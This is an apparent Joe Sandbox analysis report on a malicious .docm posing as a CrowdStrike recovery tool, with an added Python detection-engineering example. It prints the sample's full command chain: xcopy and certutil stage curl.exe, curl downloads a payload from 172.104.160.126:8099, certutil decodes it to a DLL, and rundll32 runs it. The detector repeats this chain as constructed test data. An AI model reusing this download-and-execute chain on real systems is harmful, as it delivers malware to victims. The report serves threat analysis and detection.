Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\certutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
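The chain recorded above is built entirely from binaries that ship with Windows: xcopy stages a copy of the system curl.exe in the user's Temp directory, certutil -encode and -decode re-write that copy through a base64 round trip, the relocated curl fetches payload2.txt from 172.104.160.126:8099, certutil -decode turns it into mscorsvc.dll, rundll32 calls its DllMain, and the intermediates are deleted. The following is an added example, not part of the Joe Sandbox report and not code from the sample, showing how a detection engineer would score such process-creation telemetry: each event is checked against per-step rules, and hits are rolled up to the cmd.exe that spawned the steps, so the chain is reported as a whole rather than as isolated certutil or rundll32 alerts. The event records are constructed here to mirror the command lines above (the del steps are left out of the cmd.exe line), the rule names are this example's own, and the certutil -urlcache rule covers a common download variant that this sample does not use.

```python
"""Score process-creation events for the LOLBin staging chain in this report.

Added example, not Joe Sandbox output or code from the sample. Events are
constructed to mirror the report's command lines; rule names are this example's own.
"""
import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = ("certutil", "rundll32", "xcopy", "curl", "mshta", "regsvr32", "bitsadmin")
# User-writable staging directory used by the chain; trailing separator optional.
TEMP_RE = re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp(\\|$)", re.I)
SYSTEM32_RE = re.compile(r"^[a-z]:\\windows\\system32\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev, by_pid):
    """Return the set of rule names a single event triggers."""
    name = basename(ev.image)
    # posix=False keeps Windows backslashes; strip the quotes cmd.exe puts around paths.
    args = [a.strip('"').lower() for a in shlex.split(ev.cmdline, posix=False)]
    parent = by_pid.get(ev.ppid)
    hits = set()
    if name == "cmd.exe":
        if parent and basename(parent.image) in OFFICE_APPS:
            hits.add("office_spawned_cmd")
        if sum(bool(re.search(rf"\b{t}\b", ev.cmdline.lower())) for t in LOLBINS) >= 2:
            hits.add("cmd_chains_multiple_lolbins")
    elif name == "xcopy.exe" and len(args) >= 3:
        if SYSTEM32_RE.match(args[1]) and TEMP_RE.search(args[2]):
            hits.add("system_binary_copied_to_temp")
    elif name == "certutil.exe":
        if "-encode" in args:
            hits.add("certutil_encode")
        if "-decode" in args or "-decodehex" in args:
            hits.add("certutil_decode")
        if "-urlcache" in args:  # common download variant; this sample does not use it
            hits.add("certutil_download")
    elif name == "curl.exe" and TEMP_RE.search(ev.image):
        hits.add("curl_executed_from_temp")
    elif name == "rundll32.exe" and any(TEMP_RE.search(a) and ".dll" in a for a in args[1:]):
        hits.add("rundll32_dll_from_temp")
    return hits


def correlate(events, min_rules=3):
    """Roll hits up to the nearest cmd.exe ancestor; a cmd.exe whose subtree
    spans at least min_rules distinct rules is reported as one staging chain."""
    by_pid = {e.pid: e for e in events}
    per_event = {e.pid: classify(e, by_pid) for e in events}
    chains = {}
    for ev in events:
        if not per_event[ev.pid]:
            continue
        anchor = ev
        while anchor is not None and basename(anchor.image) != "cmd.exe":
            anchor = by_pid.get(anchor.ppid)
        key = anchor.pid if anchor is not None else ev.pid
        chains.setdefault(key, set()).update(per_event[ev.pid])
    return per_event, {pid: r for pid, r in chains.items() if len(r) >= min_rules}


# Constructed telemetry mirroring the report's process tree (del steps omitted).
TEMP = r"C:\Users\user\AppData\Local\Temp"
SYS = r"C:\Windows\System32"
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
URL = "http://172.104.160.126:8099/payload2.txt"
CHAIN = (rf'"{SYS}\cmd.exe" /c xcopy {SYS}\curl.exe {TEMP} & certutil -f -encode {TEMP}\curl.exe'
         rf' {TEMP}\curl.txt & certutil -f -decode {TEMP}\curl.txt {TEMP}\curl.exe & {TEMP}\curl.exe'
         rf' {URL} -o {TEMP}\mscorsvc.txt & certutil -f -decode {TEMP}\mscorsvc.txt {TEMP}\mscorsvc.dll'
         rf' & start " " rundll32 {TEMP}\mscorsvc.dll,DllMain & exit')
SAMPLE_EVENTS = [
    ProcEvent(100, 1, WORD, f'"{WORD}" /n'),
    ProcEvent(200, 100, rf"{SYS}\cmd.exe", CHAIN),
    ProcEvent(201, 200, rf"{SYS}\xcopy.exe", rf"xcopy {SYS}\curl.exe {TEMP}"),
    ProcEvent(202, 200, rf"{SYS}\certutil.exe", rf"certutil -f -encode {TEMP}\curl.exe {TEMP}\curl.txt"),
    ProcEvent(203, 200, rf"{SYS}\certutil.exe", rf"certutil -f -decode {TEMP}\curl.txt {TEMP}\curl.exe"),
    ProcEvent(204, 200, rf"{TEMP}\curl.exe", rf"{TEMP}\curl.exe {URL} -o {TEMP}\mscorsvc.txt"),
    ProcEvent(205, 200, rf"{SYS}\certutil.exe", rf"certutil -f -decode {TEMP}\mscorsvc.txt {TEMP}\mscorsvc.dll"),
    ProcEvent(206, 200, rf"{SYS}\rundll32.exe", rf"rundll32 {TEMP}\mscorsvc.dll,DllMain"),
    # Benign control: an Explorer-spawned certificate check must not fire.
    ProcEvent(50, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(300, 50, rf"{SYS}\certutil.exe", r"certutil -verify C:\certs\root.cer"),
]

if __name__ == "__main__":
    per_event, flagged = correlate(SAMPLE_EVENTS)
    print({pid: sorted(r) for pid, r in per_event.items() if r}, "flagged:", sorted(flagged))
```

Run the file directly to print the per-event hits and the flagged cmd.exe. The single benign certutil -verify under explorer.exe produces no hit, which is why the roll-up requires several distinct rules before a shell is reported: any one of certutil -decode, a copied curl.exe, or rundll32 with a DLL in Temp is noisy on its own, but all of them under one Office-spawned cmd.exe is the pattern this report documents.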
MITRE ATT&CK matrix (a leading number is the count of signatures that hit the technique in this analysis; cells without a number are the unchanged matrix template):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 32 Scripting | Valid Accounts | 13 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 13 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 Obfuscated Files or Information | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 14 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1478411 | Sample: New_Recovery_Tool_to_help_w... | Start date: 22/07/2024 | Architecture: WINDOWS | Score: 88

Signatures on the sample node: Multi AV Scanner detection for submitted file; Document contains VBA stomped code (only p-code) potentially bypassing AV detection; Machine Learning detection for dropped file; 8 other signatures

Process tree as drawn in the graph (graph node number in parentheses; the two counts after each WINWORD.EXE are the created-registry-values and created-files badges, the single counts after child processes are the badges as drawn):

WINWORD.EXE (7; 291 / 25)
  cmd.exe (17)
    certutil.exe (26; 2) -> dropped C:\Users\user\AppData\Local\Temp\curl.txt (PEM)
    xcopy.exe (29; 1) -> dropped C:\Users\user\AppData\Local\Temp\curl.exe (PE32+)
    certutil.exe (31; 2)
    3 other processes (39)
WINWORD.EXE (9; 5 / 19) -> dropped C:\Users\user\AppData\Local\...\~WRC0001.tmp (Microsoft)
  cmd.exe (19)
    certutil.exe (33; 2)
    certutil.exe (35; 2)
    certutil.exe (37; 1)
    3 other processes (41)
chrome.exe (12; 5) -> 239.255.255.250 (unknown, Reserved); dropped C:\...\MsftRecoveryToolForCSv2.zip (copy) (Zip)
  chrome.exe (21) -> www.google.com 142.250.203.100:443 (local ports 49170, 49174; GOOGLEUS, United States); sb-ssl.l.google.com 172.217.168.14:443 (local port 49171; GOOGLEUS, United States); sb-ssl.google.com
  chrome.exe (24)
chrome.exe (15)

Antivirus detection, submitted file:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | 26% | ReversingLabs | Script-Macro.Downloader.Heuristic | |

Antivirus detection, dropped files:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\curl.exe | 0% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches
Antivirus detection, URLs:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://aka.ms/WRH | 0% | Avira URL Cloud | safe |
| https://curl.se/libcurl/c/curl_easy_setopt.html | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/copyright.htmlD | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/hsts.html | 0% | Avira URL Cloud | safe |
| https://curl.se/ | 0% | Avira URL Cloud | safe |
| http://172.104.160.126:80X99 | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/http-cookies.html | 0% | Avira URL Cloud | safe |
| https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/ | 0% | Avira URL Cloud | safe |
| http://172.104.160.126:8099 | 0% | Avira URL Cloud | safe |
| https://aka.ms/vs/17/release/vc_redist.x64.exe | 0% | Avira URL Cloud | safe |
| http://172.104.160. | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/copyright.html | 0% | Avira URL Cloud | safe |
| https://curl.se/P | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/sslcerts.html | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/hsts.html# | 0% | Avira URL Cloud | safe |
| https://azure.status.microsoft/status | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/http-cookies.html# | 0% | Avira URL Cloud | safe |
| https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | 0% | Avira URL Cloud | safe |
| https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html | 0% | Avira URL Cloud | safe |
| http://172.104.160.126:8099/payload2.txt | 0% | Avira URL Cloud | safe |
| https://curl.se/docs/sslcerts.htmlcurl | 0% | Avira URL Cloud | safe |
Domains:

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| sb-ssl.l.google.com | 172.217.168.14 | true | false | | unknown |
| www.google.com | 142.250.203.100 | true | false | | unknown |
| sb-ssl.google.com | unknown | unknown | false | | unknown |
Contacted URLs:

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | Avira URL Cloud: safe | unknown |

URLs from memory and binaries:

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://curl.se/docs/hsts.html | curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr | false | Avira URL Cloud: safe | unknown |
| https://aka.ms/vs/17/release/vc_redist.x64.exe | document.xml | false | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/copyright.htmlD | xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr | false | Avira URL Cloud: safe | unknown |
| https://curl.se/ | curl.exe | false | Avira URL Cloud: safe | unknown |
| https://aka.ms/WRH | ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | false | Avira URL Cloud: safe | unknown |
| https://curl.se/libcurl/c/curl_easy_setopt.html | curl.exe.4.dr | false | Avira URL Cloud: safe | unknown |
| https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/ | ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | false | Avira URL Cloud: safe | unknown |
| http://172.104.160.126:8099 | vbaProject.bin | true | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/http-cookies.html | curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr | false | Avira URL Cloud: safe | unknown |
| http://172.104.160.126:80X99 | vbaProject.bin | false | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/copyright.html | curl.exe | false | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/hsts.html# | curl.exe | false | Avira URL Cloud: safe | unknown |
| https://azure.status.microsoft/status | ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | false | Avira URL Cloud: safe | unknown |
| https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html | ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | false | Avira URL Cloud: safe | unknown |
| http://172.104.160. | ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr | true | Avira URL Cloud: safe | unknown |
| https://curl.se/P | xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr | false | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/http-cookies.html# | curl.exe | false | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/sslcerts.html | curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr | false | Avira URL Cloud: safe | unknown |
| http://172.104.160.126:8099/payload2.txt | curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/sslcerts.htmlcurl | curl.exe | false | Avira URL Cloud: safe | unknown |
Contacted IPs:

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.217.168.14 | sb-ssl.l.google.com | United States | 15169 | GOOGLEUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 142.250.203.100 | www.google.com | United States | 15169 | GOOGLEUS | false |
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1478411
Start date and time: 2024-07-22 15:50:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 25
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Detection: MAL
Classification: mal88.expl.evad.winDOCM@51/26@4/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .docm
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Browse link: https://go.microsoft.com/fwlink/?linkid=2280386
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.217.168.3, 173.194.79.84, 172.217.168.46, 34.104.35.123, 184.28.89.167, 184.30.24.206, 142.250.203.99
• Excluded domains from analysis (whitelisted): accounts.google.com, clientservices.googleapis.com, e11290.dspg.akamaiedge.net, clients2.google.com, go.microsoft.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, edgedl.me.gvt1.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, go.microsoft.com.edgekey.net, update.googleapis.com, download.microsoft.com, clients.l.google.com
• Execution Graph export aborted for target curl.exe, PID 2432, because there are no executed functions
• Execution Graph export aborted for target curl.exe, PID 3136, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big; too many NtQueryValueKey calls found
• VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
        No simulations
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
        Category:dropped
        Size (bytes):74268
        Entropy (8bit):7.9444839660162145
        Encrypted:false
        SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
        MD5:45C59288E77195B7C14579CD59717986
        SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
        SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
        SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
        Category:dropped
        Size (bytes):79621
        Entropy (8bit):7.949654755512444
        Encrypted:false
        SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
        MD5:54A07C35DADB508F554F0ED25AA155B3
        SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
        SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
        SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
        Category:modified
        Size (bytes):44995
        Entropy (8bit):7.9304820357792645
        Encrypted:false
        SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
        MD5:D76D9D62CD9BDB3201F8B08A60DDD681
        SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
        SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
        SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
        Category:dropped
        Size (bytes):66364
        Entropy (8bit):7.930881392262679
        Encrypted:false
        SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
        MD5:FA62B61B2E012E56787AD09FF660B32A
        SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
        SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
        SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
